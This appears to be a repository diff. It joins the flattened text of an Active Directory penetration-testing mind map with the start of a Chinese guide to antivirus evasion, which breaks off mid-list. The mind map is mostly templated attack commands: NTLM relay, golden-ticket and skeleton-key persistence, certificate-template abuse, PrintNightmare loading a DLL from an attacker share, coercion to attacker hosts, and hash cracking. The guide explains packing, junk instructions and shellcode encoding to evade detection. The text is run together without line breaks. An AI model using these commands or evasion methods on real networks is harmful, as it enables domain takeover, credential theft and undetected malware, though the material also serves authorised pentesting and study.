manager‎auxiliary/scanner/http/tomcat_enum‎exploit/multi/http/tomcat_mgr_deploy‎java rmi‎exploit/multi/misc/java_rmi_server‎java serialized port‎ysoserial‎vulnerable product with cve‎searchsploit‎proxylogon‎proxyshell‎log4shell‎${jndi:ldap://<ip>:<port>/o=reference}‎rogueJndi-1.0.jar‎database credentials‎use admin/mssql/mssql_enum_sql_logins‎...‎Admin‎Domain Admin‎MSSQL connection‎Admin‎Domain Admin‎Low Access‎Credits‎mayfly (@M4yFly) ‎viking (@Vikingfr)‎Sant0rryu (@Sant0rryu)‎Jenaye (@jenaye_fr)‎Daahtk (@Daahtk)‎Entry point‎Highlight Technique 1‎technique/status/explanation‎Enumeration infos‎linux command‎windows command‎result / go to‎Technique 2 (CVE)‎technique/status/explanation‎windows command‎linux command‎or‎Result / go to 1‎Result / go to 2‎Technique3‎technique/status/explanation‎technique/status/explanation‎assemble‎windows command‎linux command‎go to‎Legend‎Bloodhound‎PowerView ‎Impacket‎crackmapexec‎certipy‎Metsaploit‎Windows tool‎Command‎dangerous (could break stuff)‎🔥 very common and efficient technic (quick ‎win)‎CVE (probably patched)‎inspired by / Sources‎https://www.thehacker.recipes/ (@_nwodtuhs)‎https://www.ired.team/ (@spotheplanet)‎https://ppn.snovvcrash.rocks/ (@snovvcrash)‎https://book.hacktricks.xyz/ (@carlospolopm)‎https://github.com/swisskyrepo/‎PayloadsAllTheThings/ (@pentest_swissky)‎https://blog.harmj0y.net/ (@harmj0y)‎https://hausec.com/domain-penetration-‎testing/ (@haus3c)‎https://dirkjanm.io/ (@_dirkjan)‎https://casvancooten.com/ (@chvancooten)‎https://zer1t0.gitlab.io/posts/attacking_ad/‎https://beta.hackndo.com (@HackAndDo)‎and a lot more ...‎(MITM)‎Listen and Relay‎Listen‎🔥 responder -I eth0 (use --lm to force lm ‎downgrade)‎smbclient.py‎NetNtlmv1‎NetNtlmv2‎User‎NTLM relay‎relay on itself‎MS08-068‎use exploit/windows/smb/smb_relay #‎windows200 / windows server2008‎Admin‎SMB -> LDAP(S)‎NetNTLMv1‎remove mic‎NetNTLMv2‎remove mic (CVE-2019-1040)‎relay to LDAP‎ntlmrelayx.py --remove-mic --escalate-user <‎user> -t ldap://<dc_fqdn> -smb2support‎ntlmrelayx.py -t ldaps://<dc> --remove-mic --‎add-computer <computer_name> <computer_‎password> --delegate-access -smb2support‎ntlmrelayx -t ldap://<dc> --shadow-‎credentials --shadow-target '<dc>'‎ntlmrelayx.py -wh <attacker_ip> -t ldap://<‎target> -l /tmp -6 -debug‎RBCD‎DcSync‎shadow credentials‎Users‎HTTP(S) -> LDAP‎-> SMB‎SMB unsigned‎Find SMB not signed (default on non DC)‎nmap -Pn -sS -T4 --open --script smb-security-‎mode -p445 ADDRESS/MASK‎use exploit/windows/smb/smb_relay‎cme smb $hosts --gen-relay-list relay.txt‎ntlmrelayx.py -tf targets.txt -smb2support (-‎6) --enum-domain‎🔥ntlmrelayx.py -tf targets.txt -‎smb2support -socks (-6)‎lateral move (socks)‎Users‎-> HTTP‎http ADCS web‎sccm ntlm relay attack‎ESC8‎-> MSSQL‎relay to mssql‎ntlmrelayx.py -t mssql://<ip> -smb2support ‎–socks‎lateral move (socks)‎SMB -> Netlogon‎Zero-Logon (safe method)‎(CVE-2020-1472)‎coerce come from dc01, relay to dc02‎ntlmrelayx.py -t dcsync://<dc_02_ip> -‎smb2support -auth-smb <user>:<password>‎DcSync‎wsus relay‎pywsus.py‎Persistence‎net group "domain admins" myuser /add /domain‎Golden ticket‎ticketer.py -aesKey <aeskey> -domain-sid <‎domain_sid> -domain <domain> <anyuser> ‎mimikatz "kerberos::golden /user:<admin_user> /‎domain:<domain> /sid:<domain-sid>/aes256:<‎krbtgt_aes256> /ptt"‎Silver Ticket‎mimikatz "kerberos::golden /sid:<current_user_‎sid> /domain:<domain-sid> /target:<target_‎server> /service:<target_service> /aes256:<‎computer_aes256_key> /user:<any_user> /ptt"‎ticketer.py -nthash <machine_nt_hash> -domain-‎sid <domain_sid> -domain <domain> <anyuser>‎Diamond ticket‎Saphire Ticket‎Directory Service Restore Mode (DSRM)‎PowerShell New-ItemProperty “HKLM:\System\‎CurrentControlSet\Control\Lsa\” -Name ‎“DsrmAdminLogonBehavior” -Value 2 -‎PropertyType DWORD‎Skeleton Key‎mimikatz "privilege::debug" "misc::skeleton" "‎exit"‎password is mimikatz‎Custom SSP‎mimikatz "privilege::debug" "misc::memssp" "‎exit"‎C:\Windows\System32\kiwissp.log‎Golden certificate‎certipy ca -backup -ca '<ca_name>' -username <‎user>@<domain> -hashes <hash>‎certipy forge -ca-pfx <ca_private_key> -upn <‎user>@<domain> -subject 'CN=<user>,CN=‎Users,DC=<CORP>,DC=<LOCAL>‎DC shadow‎Acl manipulation‎...‎Trust relationship‎Enumeration‎nltest.exe /trusted_domains‎([System.DirectoryServices.ActiveDirectory.‎Domain]::GetCurrentDomain()).GetAllTrustRel‎ationships()‎Get-DomainTrust -Domain <domain>‎Get-DomainTrustMapping‎ldeep ldap -u <user> -p '<password>' -d <‎domain> -s ldap://<dc_ip> trusts‎Child Domain to Forest Compromise - extra SIDs‎(parent/child) (child/parent)‎Golden ticket‎Get-DomainSID -Domain <domain>‎Get-DomainSID -Domain <target_domain>‎mimikatz lsadump::dcsync /domain:<domain> /‎user:<domain>\krbtgt‎mimikatz kerberos::golden /user:Administrator /‎krbtgt:<HASH_KRBTGT> /domain:<domain> /‎sid:<user_sid> /sids:<RootDomainSID-519> /ptt‎lookupsid.py -domain-sids <domain>/<user>:'<‎password>'@<dc_ip> 0‎ticketer.py -nthash <child_krbtgt_hash> -domain-‎sid <child_sid> -domain <child_domain>‎ -extra-sid <parent_domain_sid>-519 goldenuser‎raiseChild.py <domain>/<user>:'<password>' ‎inter_realm_ticket TRUST (parent/child) (child/‎parent)‎mimikatz lsadump::trust /patch‎mimikatz kerberos::golden /user:Administrator /‎domain:<domain> /sid:<domain_sid> /aes256:<‎trust_key_aes256> /sids:<target_domain_sid>-‎519 /service:krbtgt /target:<target_domain> /ptt‎ticketer.py -nthash <trust_key> -domain-sid <‎child_sid> -domain <child_domain>‎ -extra-sid <parent_domain_sid>-519 -spn ‎krbtgt/<parent_domain> goldenuser‎getST.py -k -no-pass -spn cifs/<dc_fqdn> <‎parent_domain>/trustfakeuser@<parent_‎domain> -debug‎Breaking forest trust‎(printerbug or petitpotam to force the DC of the ‎external forest to connect on a local ‎unconstrained delegation machine. Capture TGT, ‎inject into memory and dcsync)‎ForeignGroupMember‎Users with foreign Domain Group Membership‎MATCH p=(n:User)-[:MemberOf]->(m:Group) ‎WHERE n.domain="<domain>" AND m.domain<>‎n.domain RETURN p‎Groups with Foreign Domain Group Membership‎MATCH p=(n:Group {domain:"<domain>"})-[:‎MemberOf]->(m:Group) WHERE m.domain<>n.‎domain AND n.name<>m.name RETURN p‎Get-DomainForeignGroupMember -Domain <‎target>‎convertfrom-sid <sid>‎User on both domains‎ACL‎password reuse‎Forest To Forest - extra SID‎(SID History / TREAT_AS_EXTERNAL)‎Golden ticket‎Get-DomainSID -Domain <domain>‎Get-DomainSID -Domain <target_domain>‎(SID filtering, Find group with SID > 1000)‎Get-DomainGroupMember -Identity "<group>" -‎Domain <target_domain>‎mimikatz lsadump::dcsync /domain:<domain> /‎user:<domain>\krbtgt‎mimikatz kerberos::golden /user:Administrator /‎krbtgt:<HASH_KRBTGT> /domain:<domain> /‎sid:<user_sid> /sids:<RootDomainSID>-<GROUP_‎SID_SUP_1000> /ptt‎ticketer.py -nthash <krbtgt_hash> -domain-sid <‎from_sid> -domain <from_domain>‎ -extra-sid <to_domain>-<group_id> ‎goldenuser //(group id must be > 1000)‎Trust ticket‎Get the trust ticket in the ntds (TARGET_‎DOMAIN$)‎ticketer.py -nthash <trust_key> -domain-sid <‎from_domain_sid> -domain <from_domain>‎ -extra-sid <to_domain>-<group_id> -spn ‎krbtgt/<to_domain> trustuser //(group id must ‎be > 1000)‎getST.py -k -no-pass -spn cifs/<dc_fqdn> <‎parent_domain>/trustfakeuser@<parent_‎domain> -debug‎Forest to Forest Compromise - MSSQL trusted ‎links‎Get-SQLServerLinkCrawl -username <user> -‎password <pass> -Verbose -Instance <sql_‎instance>‎mssqlclient.py -windows-auth <domain>/<‎user>:<password>@<ip> (pr #1397)‎trustlink‎sp_linkedservers‎use_link‎MSSQL‎Pass the ticket‎Uncontrained delegation‎lateral move (creds/pth/...)‎Pass the ticket‎Low access‎Get Applocker info‎Get-ChildItem -Path HKLM:\SOFTWARE\Policies\‎Microsoft\Windows\SrpV2\Exe (dll/msi/...)‎winpeas.exe‎AMSI bypass‎https://amsi.fail/‎Reflection method‎Patching amsi.dll‎search password files‎findstr /si 'password' *.txt *.xml *.docx‎User account‎clear text pass‎AppLocker (whitelisting) bypass‎use C:\Windows\Tasks‎use C:\Windows\Temp‎Powershell CLM bypass‎installutil.exe /logfile= /LogToConsole=false /U ‎C:\runme.exe‎mshta.exe my.hta‎MSBuild‎User Access Control (UAC) bypass‎FodHelper‎WSReset‎MSDT‎SMBGhost CVE-2020-0796‎CVE-2021-36934 (HiveNightmare/‎SeriousSAM)‎service account (IIS/Mssql) ‎(got SEImpersonate)‎RoguePotato‎Juicy Potato / Lovely Potato‎🔥 PrintSpoofer‎CertPotato‎./Rubeus tgtdeleg /nowrap‎TGT (pass the ticket)‎certipy req -k -ca <ca>‎ -template Machine -target <dc>‎certipy auth -pfx <pfxile>‎shadow credentials‎certipy shadow auto -u '<machine>$'@<‎domain> -k account '<machine$>'‎Machine NT Hash‎ticketer.py -nthash <hash> -domain-sid <‎domain_sid> -domain <domain> -spn cifs/<dc> <‎targetUser>‎🔥 KrbRelayUp‎.\KrbRelayUp.exe relay -Domain <domain> -‎CreateNewComputerAccount -ComputerName <‎computer$> -ComputerPassword <password>‎./KrbRelayUp.exe spawn -m rbcd -d <omdain> -‎dc <dc> -cn <computer_name>-cp <omputer_‎pass>‎...‎Admin Access‎Low access (without applocker)‎Known vulnerabilities‎MS14-068‎FindSMB2UPTime.py <ip>‎rpcclient $> lookupnames <name>‎wmic useraccount get name,sid‎auxiliary/admin/kerberos/ms14_068_kerberos_‎checksum‎goldenPac.py -dc-ip <dc_ip> <domain>/<‎user>:'<password>'@<target>‎privexchange‎(CVE-2019-0724, CVE-2019-0686)‎python privexchange.py -ah <attacker_host_or_‎ip> <exchange_host> -u <user> -d <domain> -p <‎password>‎Coerce HTTP ->‎dom admin‎Admin‎🔥SamAccountName / nopac‎CVE-2021-42287/CVE-2021-42278‎scan‎cme smb <ip> -u <user> -p <password> -M ‎nopac‎.\noPac.exe -domain <domain> -user <user> -‎pass <pass> /dc <dc_fqdn> /mAccount <‎machine_account> /mPassword <machine_‎pass> /service cifs /ptt‎with impacket : addcomputer.py / addspn.py / ‎renameMachine.py / getTGT.py / ‎renameMachine.py / getST.py‎Pass the ticket‎DCSYNC‎DOM ADMIN‎Delete computer‎🔥PrintNightmare ‎(CVE-2021-1675 / CVE-2021-34527)‎CVE-2021-1675.py <domain>/<user>:<‎password>@<target> '\\<smb_server_ip>\<‎share>\inject.dll'‎🔥Certifried‎(CVE-2022-26923)‎(need ADCS)‎certipy account create -u <user>@<domain> -‎p '<password>' -user 'certifriedpc' -pass '‎certifriedpass' -dns '<fqdn_dc>'‎certipy req -u 'certifriedpc$'@<domain> -p '‎certifriedpass' -target <ca_fqdn> -ca <ca_‎name> -template Machine‎certipy auth -pfx <pfx_file> -username '<dc>$' -‎domain <domain> -dc-ip <dc_ip>‎Pass the ticket‎DCSYNC‎DOM ADMIN‎Delete computer‎Admin‎Pass the ticket‎dom admin‎Admin‎ADCS weak configuration‎ Web enrollement is up‎🔥ESC8‎ntlmrelayx.py -t http://<dc_ip>/certsrv/certfnsh.‎asp -debug -smb2support --adcs --template ‎DomainController‎Rubeus.exe asktgt /user:<user> /certificate:<‎base64-certificate> /ptt‎gettgtpkinit.py -pfx-base64 $(cat cert.b64) <‎domain>/<dc_name>$ <ccache_file>‎certipy relay -ca <ca_ip> -template ‎DomainController‎certipy auth -pfx <certificate> -dc-ip <dc_ip>‎Pass the ticket‎DCSync‎DomAdmin‎Get templates information ‎ certutil -v -dsTemplate‎ certify.exe find [ /vulnerable]‎ certipy find -u <user>@<domain> -p <‎password> -dc-ip <domaincontroller>‎Misconfigured Certificate Templates‎ESC1 (Request a certificate from a vulnerable ‎template)‎certipy req -u <user>@<domain> -p <‎password> -target <ca_server> -template '<‎vulnerable template name>' -ca <ca_name> -‎upn <target_user>@<domain>‎certify.exe request /ca:<server>\<ca-name> /‎template:"<vulnerable template name>" [/‎altname:"Admin"]‎Pass the certificate‎ESC2‎ESC3 (Use an enrollement agent to request a ‎certificate)‎certify.exe request /ca:<server>\<ca-name> /‎template:"<vulnerable template name>"‎certify.exe request request /ca:<server>\<ca-‎name> /template:<template> /onbehalfof:<‎domain>\<user> /enrollcert:<path.pfx> [/‎enrollcertpw:<cert-password>]‎certipy req -u <user>@<domain> -p <‎password> -target <ca_server> -template '<‎vulnerable template name>' -ca <ca_name>‎certipy req -u <user>@<domain> -p <‎password> -target <ca_server> -template '<‎vulnerable template name>' -ca <ca_name> -on-‎behalf-of '<domain>\<user>' -pfx <cert>‎Pass the certificate‎getACL information‎ certipy find -u <user>@<domain> -p <‎password> -dc-ip <domaincontroller>‎Misconfigured ACL‎ESC4‎write privilege over a certificate template‎certipy template -u <user>@<domain> -p '<‎password>' -template <vuln_template> -save-‎old -debug‎ESC1 on vulnerable template‎restore template‎certipy template -u <user>@<domain> -p '<‎password>' -template <vuln_template> -‎configuration <template>.json‎ESC7‎Manage CA‎certipy ca -ca <ca_name> -add-officer '<user>' -‎username <user>@<domain> -password <‎password>‎Manage certificate‎certipy ca -ca <ca_name> -enable-template '<‎ecs1_vuln_template>'-username <user>@<‎domain> -password <password>‎certipy req -username <user>@<domain> -‎password <password> -ca <ca_name> -‎template '<vulnerable template name>' -upn '<‎target_user>'‎error, but save private key‎Issue request‎certipy ca -u <user>@<domain> -p '<‎password>' -ca <ca_name> -issue-request <‎request_id>‎certipy req -u <user>@<domain> -p '<‎password>' -ca <ca_name> -retreive <request_‎id>‎Pass the certificate‎Display CA information‎ certutil -TCAInfo‎ certify.exe cas‎Get CA flags (if remote registry is enabled)‎ certutil -config "CA_HOST\CA_NAME" -getreg "‎policy\EditFlags"‎certipy / certify.exe (only the flag ‎ATTRIBUTESUBJECTALTNAME2)‎Misconfigured CA‎ESC6 ‎Abuse ATTRIBUTESUBJECTALTNAME2 flag set ‎on CA‎you can choose any certificate template that ‎permits client authentication‎ESC1‎Get PKI objects information‎ certify.exe pkiobjects‎vulnerable PKI Object access control‎ESC5‎ACL‎Misconfigured Certificate Mapping ‎(blind test)‎ESC9/ESC10‎certipy shadow auto -username <accountA>@<‎domain> -p <passA> -account <accountB>‎ESC9/ESC10 (Case 1)‎certipy account update -username <‎accountA>@<domain> -password <passA> -‎user <accountB> -upn Administrator‎ESC9‎certipy req -username <accountB>@<domain> -‎hashes <hashB> -ca <ca_name> -template <‎vulnerable template>‎ESC10 (Case 1)‎certipy req -username <accountB>@<domain> -‎hashes <hashB> -ca <ca_name> -template <any ‎template with client auth>‎ESC10 (Case 2)‎certipy account update -username <‎accountA>@<domain> -password <passA> -‎user <accountB> -upn '<dc_name$>@<domain>'‎Reset accountB UPN‎certipy account update -username <‎accountA>@<domain> -password <passA> -‎user <accountB> -upn <accountB>@<domain>‎[Kerberos Mapping] ESC9/ESC10(Case 1)‎[Schannel Mapping] ESC9/ESC10 (Case 2) ‎Pass the certificate‎Kerberos Delegation‎list delegations‎ldeep ldap -u <user> -p '<password>' -d <‎domain> -s ldap://<dc_ip> delegations‎findDelegation.py <domain>/<user>:<‎password>@<ip>‎Unconstrained delegation‎Get unconstrained delegation machines‎Get-NetComputer -Unconstrained‎Get-DomainComputer -Unconstrained -‎Properties DnsHostName‎MATCH (c:Computer {unconstraineddelegation:‎true}) RETURN c‎MATCH (u:User {owned:true}), (c:Computer {‎unconstraineddelegation:true}), p=shortestPath((‎u)-[*1..]->(c)) RETURN p‎UAC: ADS_UF_TRUSTED_FOR_DEL‎EGATION‎Get tickets‎privilege::debug sekurlsa::tickets /export ‎sekurlsa::tickets /export‎Rubeus dump /service:krbtgt /nowrap‎Rubeus dump /luid:0xdeadbeef /nowrap‎(Force_connection_with_coerced_auth)‎Rubeus monitor /interval:5‎Kerberos TGT‎Kerberos TGT‎Pass The Ticket‎if dc‎DCSync‎DomAdmin‎Constrained delegation‎Get constrained delegation‎Get-DomainComputer -TrustedToAuth -‎Properties DnsHostName, MSDS-‎AllowedToDelegateTo‎Get-DomainUser -TrustedToAuth‎MATCH (c:Computer), (t:Computer), p=((c)-[:‎AllowedToDelegate]->(t)) RETURN p‎MATCH (u:User {owned:true}), (c:Computer {‎name: "<MYTARGET.FQDN>"}), p=shortestPath((‎u)-[*1..]->(c)) RETURN p‎With protocol transition (any)‎Object: msDS-AllowedToDelegateTo‎UAC: TRUST_TO_AUTH_FOR_DELEGA‎TION‎Rubeus hash /password:<password>‎Rubeus asktgt /user:<user> /domain:<domain> /‎aes256:<AES 256 hash>‎Rubeus s4u /ticket:<ticket> /impersonateuser:<‎admin_user> /msdsspn:<spn_constrained> /‎altservice:CIFS /ptt‎Altservice‎HOST‎psexec \\\<target> <cmd>‎HTTP‎Enter-Pssession -computername <target>‎Invoke-Command <target> -Scriptblock {<cmd>}‎CIFS‎dir \\<target>\c$‎LDAP‎Kerberos TGS‎Without protocol transition (kerberos only)‎Object: msDS-AllowedToDelegateTo‎UAC: TRUSTED_FOR_DELEGATION‎RBCD‎addcomputer.py -computer-name '<rbcd_‎com>$' -computer-pass '<rbcd_compass>' -dc-‎ip <dc> '<domain>/<user>:<password>'‎rbcd.py -delegate-from '<rbcd_com>$' -‎delegate-to '<constrained>$' -dc-ip‎'<dc>' -action 'write' -hashes '<hash>'‎<domain>/<constrained>$‎getST.py -self -impersonate "administrator" -dc-‎ip <ip> <domain>/<rbcd_com>$':'<rbcd_‎compass>'‎getST.py -spn host/<constrained> -hashes '' '<‎domain>/<computer_account>' -impersonate ‎Administrator --dc-ip <dc_ip> -additional-‎ticket <previous_ticket>‎getST.py -spn <constrained_spn>/<target> -‎hashes '<hash>' '<domain>/<constrained>$' -‎impersonate Administrator --dc-ip <dc_ip> -‎additional-ticket <previous_ticket>‎Kerberos TGS‎self RBCD‎Resource-Based Constrained Delegation ‎(RBCD)‎Object: msDS-‎AllowedToActOnBehalfOfOtherIdentit‎rubeus.exe hash /password:<computer_pass> /‎user:<computer> /domain:<domain>‎rubeus.exe s4u /user:<fake_computer$> /‎aes256:<AES 256 hash> /impersonateuser:‎administrator /msdsspn:cifs/<victim.domain.‎local> /altservice:krbtgt,cifs,host,http,winrm,‎RPCSS,wsman,ldap /domain:domain.local /ptt‎rbcd.py -delegate-from '<computer>$' -‎delegate-to '<target>$' -dc-ip‎'<dc>' -action 'write'‎<domain>/<user>:<password>‎getST.py -spn host/<dc_fqdn> '<domain>/<‎computer_account>:<computer_pass>' -‎impersonate Administrator --dc-ip <dc_ip>‎Kerberos TGT‎add computer account‎addcomputer.py -computer-name '<computer_‎name>' -computer-pass '<ComputerPassword>' -‎dc-host <dc> -domain-netbios <domain_‎netbios> '<domain>/<user>:<password>'‎Admin‎Got Account on the domain‎authenticated‎(cleartext pass / kerberos / NTLM)‎Get all users‎GetADUsers.py -all -dc-ip <dc_ip> <domain>/<‎username>‎cme smb <ip> -u <user> -p '<password>' --users ‎ldeep ldap -u <user> -p '<password>' -d <‎domain> -s ldap://<dc_ip> users‎Users‎enumerate SMB share‎cme smb <ip> -u <user> -p <password> --shares‎Account‎exploit smbshare‎cme smb <ip> -u <user> -p <password> -M ‎slinky -o NAME=<filename> SERVER=<ip>‎drop .url file‎Coerce SMB ->‎🔥bloodhound‎bloodhound-python -d <domain> -u <user> -p <‎password> -gc <dc> -c all‎./rusthound -d <domain_to_enum> -u '<user>@<‎domain>' -p '<password>' -o <outfile> -z‎import-module sharphound.ps1;invoke-‎bloodhound -collectionmethod all -domain <‎domain>‎sharphound.exe -c all -d <domain>‎enum ldap‎ldeep ldap -u <user> -p '<password>' -d <‎domain> -s ldap://<dc_ip> all <backup_folder>‎Powerview / SharpView‎adPeas‎pingcastle‎🔥kerberoasting‎Get kerberoastable users‎Get-DomainUser -SPN -Properties ‎SamAccountName, ServicePrincipalName‎MATCH (u:User {hasspn:true}) RETURN u‎MATCH (u:User {hasspn:true}), (c:Computer), p=‎shortestPath((u)-[*1..]->(c)) RETURN p‎Get hash‎GetUserSPNs.py -request -dc-ip <dc_ip> <‎domain>/<user>:<password>‎Rubeus kerberoast‎hash found (TGS)‎Enum dns ‎dnstool.py -u 'DOMAIN\user' -p 'password' --‎record '*' --action query <dc_ip>‎Scan network‎Enumerate AD CS ‎ 🔥 certipy find -u <user>@<domain> -p <‎password> -dc-ip <domaincontroller>‎Enumerate Azure AD connect‎find AAD connect server from MSOL description‎cme ldap <ip> -u <user> -p <password> -M get-‎desc-users | grep -i MSOL‎Coerce‎Webdav‎cme smb <ip> -u <user> -p <password> -M ‎webdav #find‎start webdav with Documents.searchConnector-‎ms file‎cme smb <ip> -u '<user>' -p '<pass>' -M drop-sc‎add attack computer in dns‎dnstool.py -u '<domain>\<user>' -p '<pass>' --‎record‎'<attack_name>' --action add --data <ip_listen> <‎dc_ip>‎coerce with <attacker_hostname>@80/‎something as target‎Coerce HTTP ->‎rpcdump.py <domain>/<user>:<password>@<‎domain_server> | grep MS-RPRN‎printerbug.py '<domain>/<username>:<‎password>'@<Printer IP> <listener_ip>‎PetitPotam.py -d <domain> -u <user>-p <‎password> <listener_ip> <target_ip>‎🔥coercer.py -u <user> -d <domain> -p <‎password> -t <target> -l <attacker_ip>‎Coerce SMB ->‎exploit !‎connect to computer‎ADCS‎Domain enum‎ACL‎Delegation‎Users‎Lateral move‎Known vulnerabilities‎Crack Hash‎LM‎john --format=lm hash.txt‎hashcat -m 3000 -a 3 hash.txt‎NTLM‎john --format=nt hash.txt‎hashcat -m 1000 -a 3 hash.txt‎NetNTLMv1‎john --format=netntlm hash.txt‎hashcat -m 5500 -a 3 hash.txt‎https://crack.sh/‎NetNTLMv2‎john --format=netntlmv2 hash.txt‎hashcat -m 5600 -a 0 hash.txt rockyou.txt‎Kerberos 5 TGS‎hashcat -m 13100 -a 0 spn.txt rockyou.txt‎john spn.txt --format=krb5tgs --wordlist=‎rockyou.txt‎Kerberos 5 TGS AES128‎hashcat -m 19600 -a 0 spn.txt rockyou.txt‎Kerberos 5 TGS AES256‎hashcat -m 19700 -a 0 spn.txt rockyou.txt‎Kerberos ASREP‎hashcat -m 18200 -a 0 AS-REP_roast-hashes ‎rockyou.txt‎MsCache 2 (slow)‎hashcat -m 2100 -a 0 mscache-hash rockyou.txt‎User account‎clear text pass \ No newline at end of file diff --git "a/tips/\345\206\205\347\275\221\346\270\227\351\200\217-\345\205\215\346\235\200.md" "b/tips/\345\206\205\347\275\221\346\270\227\351\200\217-\345\205\215\346\235\200.md" new file mode 100644 index 0000000..2f97bc7 --- /dev/null +++ "b/tips/\345\206\205\347\275\221\346\270\227\351\200\217-\345\205\215\346\235\200.md" @@ -0,0 +1,1566 @@ +# 内网渗透-免杀 + +## 杀软原理 + +可执行文件存在的两种状态及检测方式: + +- 未执行时在硬盘上的状态(静态检测) +- 执行后加载进内存的状态(动态监测) + +杀软的基本等级: + +- 无害:无任何可疑行为,无任何特征命中病毒特征 +- 可疑:存在可疑行为,例如操作注册表、打开Powershell、修改用户、操作敏感文件等 +- 有害:特征命中病毒特征 + +### 静态检测 + +静态检测是在不实际运行程序的情况下进行的分析,大部分的静态检测对象是针对特定版本的源代码,也有些静态程序分析的对象是目标代码。 + +静态检测针对样本文件在硬盘上的状态进行检测: + +- 样本Hash检测:此类检测会对文件整体以及各个节段进行Hash计算,而后对比是否存在于特征病毒库中,这是最早期的检测方法。对于Hash检测,在源码中修改一下变量名,或在编译完成之后,通过二进制查看器修改某一不重要的字节码,即可改变整个文件的Hash。 +- 特征码检测:由于样本Hash检测的缺点,特征码会提取文件中部分关键字节码作为特征进行检测,字节码可以是硬编码的IP、域名、互斥体名称、加密秘钥或部分关键流程代码。杀软会扫描存在磁盘上的镜像文件,如果满足特征码,就识别为恶意软件。 +- 黑白名单检测:对于一些系统进程或是杀软进程可能会默认加白,这样即便有些恶意行为,也不会被查杀。 + +通常静态检测会识别代码中存在的函数: + +- Windows API函数:尤其是与内存、堆、线程相关的函数,例如virualalloc、rtlmovememory、ntcreatthread等。 +- 编程语言关键词:cmd等关键词,例如Python中的subprocess.popen("cmd /c") + +常见的绕过思路: + +- 绕过静态检测的方式通常有多次加密、内存加载执行、加壳改壳、添加/替换资源、加密Shellcode等 + +常用的静态检测平台: + +- https://www.virustotal.com/,注意:Virustotal是国外平台,请谨慎操作,最好不要直接上传文件,建议仅校验并检查MD5是否为恶意文件。 + +### 动态检测 + +动态检测针对样本文件内存中的状态进行检测: + +- 内存特征码检测:对于静态文件特征码来说,可以将shellcode做多次加密,完全抹掉其原本特征,降低杀软的报毒率。但是当进入内存需要执行代码时,shellcode需要完全解密,这时候杀软只需要遍历内存,根据特征码进行查杀即可。 +- 敏感API检测(HOOK):在关键的入口或道路进行监控,如果单次或多次触发警告,比如读取并修改了其他进程的内存,或在其他进程中开了个远程线程将触发告警。对于不同杀软的不同策略,将根据调用顺序、调用源、参数判断是否是正常调用。 +- 敏感行为检测:实现一个功能,不一定非要用某一个固定的接口,因此,实现一个读写内存操作,单检测一个API是无效的。此时,只要对象触发了某种行为,在其他进程中开了线程,那么就判定为恶意行为。常见的病毒恶意行为: + - 注册表操作:添加启动项、添加服务。 + - 文件操作:写入文件、读取系统文件、删除文件、移动文件。 + - 进程操作:杀死进程、创建进程。 + - 用户操作:添加用户、删除用户、删除用户。 + - 其他操作:注入、劫持等。 + +常见的绕过思路: + +- 绕过动态检测的方式通常是白名单调用敏感行为,再导入恶意内容 + +常用的动态检测平台: + +- https://s.threatbook.cn/ + +### 流量检测 + +流量检测针对恶意程序在网络通讯流量层面上的状态进行检测: + +- 结构特征:此类特征一般是指已知远控的恶意程序心跳包,比如CS beacon心跳包特征,会按照攻击者设置的频率发送固定结构固定内容的数据包以证明存活。 +- 内容特征:此类特征一般是指各类漏洞的exp流量包特征、冰蝎、哥斯拉等流量特征,对于此类流量可以编写流量规则进行过滤检测,比如suricata规则、wireshark规则等。 +- IP/域名/证书匹配:对于数据包中的ip域名等信息,链接威胁情报平台查询是否存在恶意行为,比如扫描、用作C2回连或网站挂马等,对于此类流量可以选择弹窗告警或直接阻断。 + +常见的绕过思路: + +- 绕过流量检测的方式通常有TCP分段传输、内容加密、使用合法证书等 + +### 云查杀 + +云查杀的不同点在于它的病毒库是放在服务器端的,而不是本地客户端,只要联网,病毒库就会同步更新,病毒库更加强大。 + +当开着杀软的云查杀的时候,有时候刚开始没报病毒,但过一会就提示病毒了。 + +## 免杀原理 + +### 静态免杀 + +#### 修改特征码 + +特征码是能够识别一个程序的不大于64字节的字符。 + +修改特征码是在不改变程序运行效果的前提下,更改其特征码。 + +修改特征码最重要的是定位特征码,但是定位了特征码修改后并不代表程序就能正常运行,费时费力,由于各个杀软厂商的特征库不同,所以一般也只能对一类的杀软起效果。虽然效果不好,但有时候在没有源码的情况下可以一用。 + +#### 花指令免杀 + +花指令其实就是一段毫无意义的指令,也可以称之为垃圾指令。花指令是否存在对程序的执行结果没有影响,所以它存在的唯一目的就是阻止反汇编程序,或对反汇编设置障碍。 + +为一个程序添加一段花指令之后,程序的部分偏移会受到影响,如果反病毒软件不能识别这段花指令,那么它检测特征码的偏移量会整体位移一段位置,也就无法正常检测木马了。 + +#### 加壳免杀 + +软件加壳其实也可以称为软件加密(或软件压缩),只是加密(或压缩)的方式与目的不一样。壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。 + +加壳能够掩盖特征码,特别是对于不开源的PE文件,加壳可以绕过很多特征码识别。但是壳也有自己的特征,主流的壳例如VMP、Themida等,被检测出将直接报毒。 + +可以用一些冷门的加密壳,或基于开源压缩壳做二次开发。 + +加壳工具: + +- ASPack +- UPX + +### 动态免杀 + +#### API免杀 + +- 替换API:杀软不可能拦截所有API,可以使用相同功能的API进行替换,例如`MoveFileEx`替换`MoveFile`。 + +- 重写API:逆向后完全重写系统API功能,实现对应功能的API。 + +- 底层API:寻找更底层的API进行调用,绕过拦截,例如NT函数。或者通过DeviceloControl函数调用驱动功能来完成API功能,模拟系统调用。 + +#### 内存免杀 + +在执行外壳代码时,要先将原软件解密,并放到内存里,然后再通知CPU执行。加壳时,需要加一个混淆程序原有代码的壳,才能躲过杀软查杀。 + +#### 二次编译 + +Metasploit的Msfvenom提供了多种格式的Payload和Encoder,生成的Shellcode也为二次加工提供了很大便利。 + +Shikata_ga_nai是MSF中唯一的评价是excellent的编码器,这种多态编码技术使得每次生成的攻击载荷文件是不一样的,编码和解码也都是不一样的,还可以利用管道进行多重编码进行免杀。 + +目前Msfvenom的Encoder特征基本都进入了杀软的漏洞库,很难实现单一Encoder编码而绕过杀软,所以对Shellcode进行进一步修改编译成了MSF免杀的主流。有很多借助于C、C#、python等语言对Shellcode进行二次编码从而达到免杀的效果。 + +#### 分离免杀 + +例如Payload分离免杀和Webshell分离免杀,将Shellcode和加载器分离,实现简单,但效果不错。 + +#### 资源修改 + +有些杀软会设置有扫描白名单,比如之前把程序图标替换为360安全卫士图标就能过360的查杀。 + +- 